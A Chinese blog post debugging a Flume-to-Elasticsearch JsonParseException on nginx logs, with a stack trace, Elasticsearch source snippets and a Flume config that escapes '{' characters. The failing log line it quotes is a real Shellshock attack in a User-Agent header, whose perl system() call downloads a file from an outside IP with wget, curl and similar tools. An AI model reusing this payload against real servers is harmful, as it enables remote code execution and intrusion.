flume nginx 日志处理异常 JsonParseException: Unexpected character ('(' (code 40)): expected a valid value

最新推荐文章于 2024-09-16 00:13:13 发布
最新推荐文章于 2024-09-16 00:13:13 发布
阅读量2w 收藏
点赞数
分类专栏: flume nginx 文章标签: flumeNginx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lanmo555/article/details/50587458
版权

flume nginx 日志处理异常 JsonParseException: Unexpected character (‘(’ (code 40)): expected a valid value

最近flume处理nginx日志,每隔几天就断一次,出现JSON反序列化异常

异常堆栈:

2016/01/26 14:37:49.043 [ERROR] [] [] [SinkRunner-PollingRunner-DefaultSinkProcessor] [org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:160)]  Unable to deliver event. Exception follows.
org.apache.flume.EventDeliveryException: Failed to commit transaction. Transaction rolled back.
    at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:227)
    at org.apache.flume.sink.DefaultSinkProcessor.process(DefaultSinkProcessor.java:68)
    at org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:147)
    at java.lang.Thread.run(Thread.java:745)
Caused by: org.elasticsearch.common.jackson.core.JsonParseException: Unexpected character ('(' (code 40)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')
 at [Source: [B@78f004c9; line: 1, column: 2]
    at org.elasticsearch.common.jackson.core.JsonParser._constructError(JsonParser.java:1487)
    at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:518)
    at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportUnexpectedChar(ParserMinimalBase.java:447)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._handleUnexpectedValue(UTF8StreamJsonParser.java:2485)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._nextTokenNotInObject(UTF8StreamJsonParser.java:801)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser.nextToken(UTF8StreamJsonParser.java:697)
    at org.elasticsearch.common.xcontent.json.JsonXContentParser.nextToken(JsonXContentParser.java:51)
    at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.addComplexField(ContentBuilderUtil.java:60)
    at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.appendField(ContentBuilderUtil.java:47)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.appendHeaders(ElasticSearchLogStashEventSerializer.java:131)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:80)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:73)
    at org.apache.flume.sink.elasticsearch.client.ElasticSearchTransportClient.addEvent(ElasticSearchTransportClient.java:164)
    at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:189)

查找代码

builder.startObject("@fields");
    for (String key : headers.keySet()) {
      byte[] val = headers.get(key).getBytes(charset);
      ContentBuilderUtil.appendField(builder, key, val);
    }

原来是在序列化的时候失败了,ContentBuilderUtil

public static void appendField(XContentBuilder builder, String field,
      byte[] data) throws IOException {
    XContentType contentType = XContentFactory.xContentType(data);
    if (contentType == null) {
      addSimpleField(builder, field, data);
    } else {
      addComplexField(builder, field, contentType, data);
    }
  }

通过 XContentFactory.xContentType(data); 判断数据类型,从上面的异常堆栈判断应该是获取的是JSON类型,在看看里面怎么判断JSON的,有这么银行代码

// a last chance for JSON
for (int i = 0; i < length; i++) {
    if (bytes.get(i) == '{') {
        return XContentType.JSON;
    }
}

唉,怪出问题, 在找找这种处理异常的日志内容

54.204.47.156 - - [2016-01-19T12:50:57+08:00] "GET /index.cgi HTTP/1.1" 301 184 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  \x22);'" "-" "5.000" "-" "-"

原来userAgent中的字符串中有个{,在加个替换拦截器 search_replace 

agent.sources.www.type = exec 
agent.sources.www.command = tail -F -n 0 /data/nginx/logs/www.longdai.com.log
agent.sources.www.restart = true
agent.sources.www.logStdErr = true
agent.sources.www.batchSize = 200
agent.sources.www.channels = fch

agent.sources.www.interceptors = cdn sr www i1 
agent.sources.www.interceptors.www.type = static
agent.sources.www.interceptors.www.key = app
agent.sources.www.interceptors.www.value = www
agent.sources.www.interceptors.cdn.type = regex_filter
agent.sources.www.interceptors.cdn.regex = .*\\s+\\"ChinaCache\\"\\s+.*
agent.sources.www.interceptors.cdn.excludeEvents = true

agent.sources.www.interceptors.sr.type=search_replace
agent.sources.www.interceptors.sr.searchPattern=\\{
agent.sources.www.interceptors.sr.replaceString=%7b
agent.sources.www.interceptors.sr.charset=UTF-8

agent.sources.www.interceptors.i1.type = regex_extractor
agent.sources.www.interceptors.i1.regex = ([^\\s]*)\\s-\\s([^\\s]*)\\s\\[(.*)\\]\\s+\\"([\\S]*)\\s+([\\S]*)\\s+[\\S]*\\"\\s+(\\d+)\\s+(\\d+)\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"
agent.sources.www.interceptors.i1.serializers = s1 s2 s3 s4 s5 s6 s7 s8 s9 s10 s11 s12 s13
agent.sources.www.interceptors.i1.serializers.s1.name = remote_addr
agent.sources.www.interceptors.i1.serializers.s2.name = remote_user
agent.sources.www.interceptors.i1.serializers.s3.name = datetime
#agent.sourceswwwi.interceptors.i1.serializers.s3.type = org.apache.flume.interceptor.RegexExtractorInterceptorMillisSerializer
#agent.sourceswwwi.interceptors.i1.serializers.s3.name = timestamp
#agent.sourceswwwi.interceptors.i1.serializers.s3.pattern  = yyyy-MM-dd'T'HH:mm:ssZ
agent.sources.www.interceptors.i1.serializers.s4.name = http_method
agent.sources.www.interceptors.i1.serializers.s5.name = uri
agent.sources.www.interceptors.i1.serializers.s6.name = status
agent.sources.www.interceptors.i1.serializers.s7.name = body_length
agent.sources.www.interceptors.i1.serializers.s8.name = http_referer
agent.sources.www.interceptors.i1.serializers.s9.name = user_agent
agent.sources.www.interceptors.i1.serializers.s10.name = http_x_forwarded_for
agent.sources.www.interceptors.i1.serializers.s11.name = request_time
agent.sources.www.interceptors.i1.serializers.s12.name = upstream_addr
agent.sources.www.interceptors.i1.serializers.s13.name = upstream_response_time

agent.sources.www.interceptors.i2.type = timestamp
agent.sources.www.interceptors.i3.type = host
agent.sources.www.interceptors.i3.hostHeader = hostname


agent.sinks.elasticSearch.type = org.apache.flume.sink.elasticsearch.ElasticSearchSink
agent.sinks.elasticSearch.channel = fch
agent.sinks.elasticSearch.batchSize = 2000
agent.sinks.elasticSearch.hostNames = 172.16.0.18:9300
agent.sinks.elasticSearch.indexName = nginx
agent.sinks.elasticSearch.indexType = nginx
agent.sinks.elasticSearch.clusterName = longdai 
agent.sinks.elasticSearch.client = transport
agent.sinks.elasticSearch.serializer = org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer

flume处理nginx日志的配置可以查看这里

http://blog.csdn.net/lanmo555/article/details/50483561

ShadowWalker
关注
专栏目录
nginx+flume 数据采集
需要远程指导仿真实验、代码有问题的,请后台私信或者关注公众号
07-06 3725
本实验任务主要完成基于ubuntu环境使用nginx+flume的工作方式进行数据采集。通过完成本实验任务,要求学生了解并掌握nginx的安装、nginx的基础语法、采集数据方法以及配置格式,为从事大数据平台运维工程师、大数据技术支持工程师等岗位工作奠定夯实的技能基础。掌握flume的应用原理   掌握nginx+flume日志信息的采集过程本次环境是:Ubuntu16.04+flume-ng-1.5.0-cdh5.3.6Flume是Cloudera提供的日志收集系统,Flume支持在日志系统中定制各类数
Flume采集Nginx日志到Hive.rar
08-01
Flume采集Nginx日志到Hive的事务表时需要导入到Flume下的Jar文件,具体使用方式可参见博文:https://blog.csdn.net/l1028386804/article/details/97975539
[待解决]报错:JSON parse error: Unexpected character
weixin_30575309的博客
08-13 9353
{"code":"9999","message":"JSON parse error: Unexpected character ('%' (code 37)): expected a valid value (number, String, array, object, 'true', 'false' or 'null'); nested exception is com.faster...
JsonParseException: Unexpected character ('' (code 65279 / 0xfeff)): expected a valid value
sssffdgh的博客
11-02 1万+
【问题】 从文件中读字符串内容,使用  org.codehaus.jackson.map.ObjectMapper。将json转java对象时, 异常:org.codehaus.jackson.JsonParseException: Unexpected character ('' (code 65279 / 0xfeff)): expected a valid value 【原因】收到的j
【无标题】
最新发布
weixin_74859061的博客
09-16 248
在ubuntu中进行JSON相关学习的时候,我发现了一些小问题,决定与大家进行分享,减少踩坑时候出现不必要的时间耗费。对于这个问题的解决其实不难,只需要在每一行的后边加上连词符号 \ 即可,将多行拼成1行。可以发现报错的部分非常的多,而且都明显的指向 \ 反斜杠这一 方面的错误。尝试着将后边的空格去掉之后,再次进行编译,前边的警告错误荡然无存。这些不同于大众的颜色的反斜杠,后边带有空格,其他的没有。在这几个颜色不同的反斜杠之间瞎点,发现一个小问题。其余部分的代码与本次的错误分享无关,暂不截图。
HTTP状态码
小森呀
06-12 276
1xx(信息,服务器收到请求,需要请求者继续执行操作) 100 等待用户继续请求 101 切换协议(只能切换到更高级的协议) 2xx(成功,操作被成功接收并处理) 200 请求成功 201 成功请求并创建了新的资源 202 已经接受请求,但未处理完成 203 请求成功,但返回的meta信息不在原始的服务器,而是一个副本 204 服务器成功处理,但未返回内容 205 服务器处理成功,用户终端(例如:浏览器)应重置文档视图 20
JSON parse error: Unexpected character (‘\“‘ (code 34)): was expecting comma to separate Object ent
weixin_43997319的博客
03-09 2万+
报错"JSON parse error: Unexpected character ('\"' (code 34)): was expecting comma to separate Object entries; nested exception is com.fasterxml.jackson.core.JsonParseExc 只需要看这个'\"',代表换行符报错,缺少换行分隔符的含义 JSON parse error: Unexpected end-of-input: expected cl
[已解决]HttpMessageNotReadableException: JSON parse error: Unexpected character:解析JSON时出现异常的问题分析与解决方案
猫头虎:授渔优于赠鱼,兴趣引领智慧,探索之乐尤显珍贵。商务合作:Libin9iOak,共赴知识与乐趣的探索之旅!
07-20 2万+
在本篇博客中,我们讨论了在Spring框架应用程序中解析JSON时出现的异常,并分析了异常信息及其原因。为了解决这个问题,我们提供了相应的解决方案,并介绍了如何避免类似问题的措施。同时,我们强烈建议升级至IDEA 2023或更新版本,以确保应用程序能够正确处理JSON数据,并避免类似的解析异常。通过遵循良好的JSON数据生成和验证实践,以及使用可靠的JSON库,您可以提升开发效率和代码质量,避免潜在的编码问题。另外,使用Postman的美化功能也可以帮助您在调试和测试阶段更轻松地处理JSON数据。
Flume传输Nginx日志到HDFS
01-20
Flume:1.8.0(与Nginx部署在一起) 一、Nginx编译安装 1、官网下载.tar.gz文件,上传至linux服务器 http://nginx.org/en/download.html(建议下载Stable version) 2、解压nginx tar -zxvf nginx-14.0.tar.gz -C /...
storm-nginx-log:基于Kafka、Storm的nginx日志监控,采用Apache Flume收集日志
05-15
nginx日志监控 简单介绍 单机版(master branch) : 项目基于storm的实时nginx日志监控,通过读取nginx日志文件access.log来收集nginx服务器的状态,并在一定时间内,统计访问ip的国家地址、指定时间内所有访问次数...
Flume采集Nginx日志到新版Hive.rar
09-20
在这个场景中,我们利用Flume来从Nginx服务器收集日志,并将这些日志数据导入到新版的Hive数据仓库中。下面将详细阐述这个过程涉及的技术要点。 首先,Nginx是一款高性能的HTTP和反向代理服务器,它的日志记录了...
解决JSON传参报错问题
程序小白的博客
08-21 6327
解决JSON传参报错问题
curl执行请求报错Unexpected character (‘‘‘ (code 39)): expected a valid value
猴戏浅滩的博客
10-21 4826
Unexpected character (''' (code 39)): expected a valid value (JSON String, Number, Array, Object or token 'null', 'true' or 'false')\n at [Source: (org.elasticsearch.common.io.stream.InputStreamStreamInput); line: 1, column: 2]
JSON parse error: Unexpected character (‘1‘ (code 49))的解决方式
穆雄雄的博客
04-30 8353
现在是:2022年4月30日22:29:49 大家好,我是雄雄。 刚刚在调用接口的时候,出现了个错误: { "code": 400, "success": false, "data": null, "msg": "JSON parse error: Unexpected character ('1' (code 49)): was expecting a colon to separate field name and value; nested exception is com.fasterx
Unexpected character ('<' (code 60)): expected a valid value ...
Cabinathor的专栏
07-28 3万+
Unexpected character (' 这个问题
Java JsonParseException异常的解决
热门推荐
我的博客
10-29 4万+
在开发工作过程中,有遇到以下异常的其实是参数异常,也就是json的拼装有问题。 在接口对接的时候,对方传过来的json解析报错: org.codehaus.jackson.JsonParseException: Unexpected character ('c' (code 99)): was expecting double-quote to start field name at [S...
com.fasterxml.jackson.core.JsonParseException: Unexpected character (',' (code 44)): Expected space
xiaocxyczh的博客
02-28 2万+
今天在使用Redis做缓存时出现了如题的Bug,其实是误打误撞出现的Bug,在Redis中存储的类型都是字符串,如下图: 但是Redis的配置文件是从网上拷贝过来的,使用的value反序列化是Jackson2JsonRedisSerializer类型,应该由于value字符串中含有逗号字符导致Jackson2JsonRedisSerializer反序列化失败,而对于我的项目把序列化类型改了就...
Error reading XMLStreamReader: Unexpected character ‘x‘ (code 120) in prolog; expected ‘<‘ at [row,c
喜欢原味奶茶的博客
09-17 6533
webserve调用的时候报错。但不是每次都报错,偶尔报错。 原因,如果调用webserver的时候,传的参数是json类型,那么就会报错。webserver也支持json但是兼容性不好。有时候会解析报错,使用xml的字符串报文就不会报错。 如果你使用的就是xml字符串报文,那就检查你的xml是不是一个合法的xml字符串。 ...
nginx服务器返回json文件时json格式不正确的坑
weixin_45935461的博客
11-30 1996
nginx
Flume实战:将Nginx日志无缝传输至HDFS
本文档详细介绍了如何在Linux环境(CentOS 7)上将Nginx的...这篇文章详细描述了如何在CentOS 7环境中配置Nginx以生成日志,然后利用Flume作为中间件将这些日志实时地传输到Hadoop HDFS,以便于后续的数据分析和处理
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值